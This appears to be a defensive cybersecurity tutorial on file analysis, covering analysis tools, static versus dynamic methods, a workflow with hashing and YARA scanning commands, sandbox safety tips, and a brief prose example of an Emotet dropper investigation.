Contents
🗂️ How to Perform File Analysis in Cybersecurity
File analysis is the process of inspecting, extracting, and evaluating files to identify malicious behaviour, hidden content, or security policy violations. This is a fundamental skill in threat detection, malware investigation, and digital forensics.
🧠 Why File Analysis Matters
| Use Case | Why It’s Important |
|---|---|
| Malware Detection | Uncover viruses, trojans, or droppers disguised as legitimate files. |
| Incident Response | Understand what a malicious file did post-infection. |
| Threat Hunting | Discover suspicious binaries or scripts across an estate. |
| Compliance | Validate file contents for DLP or policy violations. |
🧰 Tools for File Analysis
| Tool | Purpose |
|---|---|
| VirusTotal | Hash- or file-based scanning across dozens of AV engines. |
| Any.Run / Joe Sandbox | Dynamic behavioural analysis of malware in a sandbox. |
| YARA | Pattern-matching tool to classify files by malware family or traits. |
| BinText / ExifTool | Extract strings, metadata, hidden content. |
| pefile / Detect It Easy (DIE) | Portable Executable (PE) structure analysis. |
| Python / PowerShell | Custom scripts for decoding or unpacking. |
| CAPE / Cuckoo Sandbox | Host your own malware sandbox with network monitoring. |
🔍 Static vs Dynamic Analysis
| Type | Description | When to Use |
|---|---|---|
| Static Analysis | Inspect file content without executing it. Includes metadata, strings, hashes. | First stage – quick and safe. |
| Dynamic Analysis | Run the file in an isolated environment to observe behaviour (e.g. registry edits, C2 calls). | When static is inconclusive. |
🧪 Step-by-Step File Analysis Workflow
🔒 1. Isolate the File
- Store it in a secure, non-networked VM or container.
- Use
.zipwith passwords to avoid accidental detonation.
🔎 2. Calculate Hashes
sha256sum suspicious_file.exe
- Use hashes to search VirusTotal, Hybrid Analysis, etc.
🧬 3. Perform Static Analysis
- Use tools like
strings,ExifTool, orpefileto inspect:- Suspicious strings (e.g. URLs, Base64 blobs, IPs)
- Metadata (e.g. author, compile time)
- File structure anomalies
⚙️ 4. Perform Dynamic Analysis
- Upload to Any.Run, Joe Sandbox, or run in a local sandbox.
- Monitor:
- File modifications
- Registry changes
- Outbound connections
- Process tree
🧰 5. Scan with AV / Threat Intel
- Upload to VirusTotal or scan offline with tools like:
- ClamAV
- Windows Defender (via
MpCmdRun) - CrowdStrike or SentinelOne (enterprise)
📜 6. Match with YARA Rules
yara malware_rules.yar suspicious_file.exe
- Use threat intel feeds (e.g. Sigma, MISP) or custom rules.
📝 7. Document Findings
- Capture indicators of compromise (IOCs): hashes, IPs, domains.
- Note TTPs (MITRE techniques) if behaviour was observed.
- Classify file (e.g. Dropper → Cobalt Strike beacon → ransomware).
⚠️ Safety Tips
- Always analyse in offline, sandboxed environments
- Do not double-click unknown files, even if they look benign (e.g.
.pdf.exe) - Use read-only mounts or Snapshot VMs to revert post-analysis
📂 Real-World Example
An email attachment
invoice.docmwas flagged by the EDR.
- Hash matched Emotet dropper in VirusTotal
- Static: Contained macros + PowerShell stager
- Dynamic: Contacted C2 server, downloaded TrickBot payload
- Action: Blocked domain, disabled user account, initiated IR